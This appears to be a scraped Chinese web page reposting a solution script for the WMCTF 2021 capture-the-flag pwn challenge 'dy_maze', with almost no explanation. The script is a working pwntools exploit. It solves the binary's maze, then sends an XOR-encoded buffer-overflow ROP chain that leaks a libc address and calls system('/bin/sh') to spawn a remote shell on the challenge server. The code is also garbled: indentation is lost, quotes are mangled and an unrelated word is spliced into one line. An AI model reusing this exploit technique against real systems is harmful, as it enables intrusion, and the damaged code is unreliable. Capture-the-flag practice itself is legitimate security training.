• 欢迎访问搞代码网站,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站!
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏搞代码吧
> 后端 > python > 关于python:WMCTF-2021-pwn-dymaze-writeup

关于python:WMCTF-2021-pwn-dymaze-writeup

python 搞代码 4年前 (2022-02-20) 10次浏览 已收录 0个评论

from pwn import *
from LibcSearcher import *
from binascii import a2b_base64
import os
context(log_level=’debug’, os=’linux’, arch=’amd64′, bits=64)
context.terminal = [‘/usr/bin/x-terminal-emulator’, ‘-e’]

Interface

local = False

binary_name = “dy_maze”

binary_name = “38a5a00c-08ac-11ec-b124-0242ac110003”
port = 44212
if local:

p = process(["./" + binary_name])
e = ELF("./" + binary_name)
# libc = e.libc

else:

p = remote("47.104.169.32", port)

def z(a=”):

if local:
    gdb.attach(p, a)
    if a == '':
        raw_input()
else:
    pass

ru = lambda x: p.recvuntil(x)
rc = lambda x: p.recv(x)
sl = lambda x: p.sendline(x)
sd = lambda x: p.send(x)
sla = lambda delim, data: p.sendlineafter(delim, data)
def encode(payload, offset):

# encode
payload_encoded = b''
for i in range(len(payload)):
    payload_encoded += (payload[i] ^ success_temp[(i + offset) % 5]).to_bytes(1, 'little')
return payload_encoded

Others

success_temp = []

Main

if name == “__main__”:

# z('b maze_25')
z('b ok_success\n')

initialize

p.recvuntil(b’Solution?’)
confirm = input()
sl(confirm)

Create binary file

ru(b’Binary Download Start’)
ru(b’\n’)
b64_data = p.recvuntil(b’\n==’, drop=True)
with open(‘temp.bz2’, ‘wb’) as f:

f.write(a2b_base64(b64_data))

ru(b’\n’)
temp_binary = Skrill下载os.popen(‘tar -xjvf temp.bz2’).read().strip(‘\n’)
e = ELF(“./” + temp_binary)

# Start ELF Analysis
d = {}
for i in range(1, 81):
    d[i] = e.symbols['maze_{}'.format(i)]
maze_address = sorted(d.items(), key=lambda x: x[1])
key = {}
for ind, addr in zip(range(80), e.search(b'\x83\xc0\x01')):
    addr -= 4
    while e.data[e.vaddr_to_offset(addr): e.vaddr_to_offset(addr) + 3] != b'\x83\x7d\xfc': addr -= 1
    key[maze_address[ind][0]] = e.data[e.vaddr_to_offset(addr) + 3]
for addr in e.search(b'\x48\x98\x88\x54\x05\xEC'):
    success_temp.append(e.data[e.vaddr_to_offset(addr) - 1])
prdi = next(e.search(b'\x5f\xc3'))
# End Analysis
# key[80] = 32
payload = b''
for i in range(1, 81):
    payload += str(key[i]).encode('utf-8') + b' '
# ok_success
payload += str(100).encode('utf-8')    
sl(payload)
sleep(2)
# p.recvall()
ru(b'Good')
# sl(b'100')
sleep(2)
# input your name:
payload = b'a' * 0x14 + b'b' * 8 + p64(prdi) + p64(e.got['puts']) + p64(e.plt['puts']) + p64(e.symbols['ok_success'])
sl(encode(payload, 0))
# sl(payload)
sleep(2)
ru(b'name: ')
puts_addr = p.recvuntil(b'\n', drop=True).ljust(8, b'\x00')
puts_addr = u64(puts_addr)
log.success("puts addr found: " + hex(puts_addr))
libc = LibcSearcher('puts', puts_addr)
# libc.select_libc(9)
libc_base = puts_addr - libc.dump('puts')
log.success('libc base found: ' + hex(libc_base))
p.sendlineafter(b'length', str(100).encode('utf-8'))
# Attacking:
payload = b'a' * 0x14 + b'b' * 8 + p64(prdi) + p64(libc.dump('str_bin_sh') + libc_base)
payload += p64(prdi + 1) + p64(libc.dump('system') + libc_base)
sla(b'name: ', encode(payload, 1))
p.interactive()
搞代码网(gaodaima.com)提供的所有资源部分来自互联网,如果有侵犯您的版权或其他权益,请说明详细缘由并提供版权或权益证明然后发送到邮箱[email protected],我们会在看到邮件的第一时间内为您处理,或直接联系QQ:872152909。本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:关于python:WMCTF-2021-pwn-dymaze-writeup

喜欢 (0)
[搞代码]
分享 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址